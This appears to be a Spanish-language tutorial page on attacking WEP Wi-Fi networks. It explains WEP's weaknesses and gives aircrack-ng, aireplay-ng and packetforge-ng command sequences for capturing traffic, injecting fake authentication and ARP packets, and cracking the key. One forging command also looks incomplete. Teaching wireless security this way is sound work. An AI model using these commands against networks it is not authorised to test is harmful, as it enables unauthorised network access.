Saltar a contenido

02.-Ataques a redes WEP

El uso de redes tipo WEP se considera obsoleto, aunque algunos dispositivos antiguos todavía utilizan este tipo de red Wi-Fi.

Usos

  • Sistemas SCADA o equipamiento antiguo (fábricas, sistemas portuarios, etc.).
  • Impresoras antiguas con conectividad Wi-Fi.

Problemas Asociados

  1. Utiliza el algoritmo RC4, vulnerable a ataques estadísticos.
  2. La clave de acceso tiene una longitud limitada (5-13 caracteres).
  3. Los clientes conectados tienen visibilidad entre ellos, lo que facilita ataques internos.
  4. Si no está segmentada, puede permitir fugas de información y accesos a otras redes.

Tipos de Ataque

Con Clientes Conectados

Monitorizar y capturar tráfico

   $ airodump-ng -c 11 --bssid AA:BB:CC:DD:EE:FF -w fichero_captura

Inyectar tramas de autenticación falsas

   $ aireplay-ng -1 0 -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0

Repetir paquetes ARP para generar más vectores de inicialización

   $ aireplay-ng -3 0 -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0

Crackear la clave con aircrack-ng

   $ aircrack-ng fichero_captura.cap

Sin Clientes Conectados

Monitorizar y capturar tráfico:

$ airodump-ng -c 11 --bssid AA:BB:CC:DD:EE:FF -w fichero_captura

Generar tramas de autenticación falsas:

$ aireplay-ng -1 0 -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0

Realizar ataque de fragmentación para generar un paquete ARP fraudulento:

$ aireplay-ng -5 0 -b AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0

Construir un paquete ARP con packetforge-ng:

$ packetforge-ng -0 AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 -k 255.255.255.255

Reenviar el paquete ARP generado:

$ aireplay-ng wlan0 -2 -r arp-packet

Crackear la clave con aircrack-ng:

$ aircrack-ng fichero_captura.cap

Para Saber Más

Consulta este video en YouTube para ver una explicación práctica sobre ataques WEP basados en fragmentación utilizando la suite aircrack-ng.